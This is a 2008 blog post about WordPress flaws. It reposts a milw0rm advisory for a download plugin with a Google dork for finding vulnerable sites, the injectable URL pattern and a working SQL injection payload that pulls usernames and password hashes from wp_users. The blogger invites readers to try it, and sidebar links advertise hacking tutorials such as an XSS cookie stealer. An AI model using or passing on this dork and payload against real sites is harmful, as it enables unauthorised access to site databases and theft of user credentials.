Latest Wordpress Vulnerability

March 31st, 2008

highly critical issue i found several day ago that wordpress 2.3.3 has vulnerability.and it has posted smackdown.blogsblogsblogs.com, shoemoney.com and even at the wordpress forum. i hope all fixed because wordpress has release the newest version.

but another vulnerability has found by BL4CK an author from milw0rm.com that another wordpress plugin vulnerable can be injected by SQLinjection like the papper BL4CK wrote below

# Wordpress Plugin Download file Remote SQL Injection Vulnerability

# Author: BL4CK

# Mail: bl4ck00@gmail.com

# Dork: inurl:”wp-download.php?dl_id=”

#Example:

http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]

#SQL:

null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*

wanna try this one?

Adobe Photoshop CS2 / CS3 File Buffer Overflow
A â€œhighly-criticalâ€ security flaw in Adobe Photoshop CS2 and CS3 that could allow remote hack…
Video Hacking : Advanced Mysql Injection in Joomla
this will be straight post , i’ll share you the latest video hacking tutorial from milw0rm.com. it’s…
News : Download KDE 4.0.1 HERE

Great news for linux users , kde.org has announce that the new version of KDE. KDE 4.0….
Tips and Tricks : How To Speed Up Internet Connection
Step by Step Hacking Website : XSS – Cookie Stealer Technique

[Read the rest on (it)gossips network: admin]

Author: Gautam Categories: Uncategorized Tags:

Comments (1) Trackbacks (0) Leave a comment Trackback

Luxor

May 29th, 2008 at 21:12 | #1

Reply | Quote

Lots of people still use wordpress 2.3.3 though, they prefer support of addons than security

Luxor’s last blog post..Dita Ambassador Sunglasses

No trackbacks yet.

Hard Drive Recovery Seven Fcuking Days

How To’s, Tech Software, Utilities, Tutorials, Gadgets

Latest Wordpress Vulnerability

Recent Posts

Categories

Archives

Recent Comments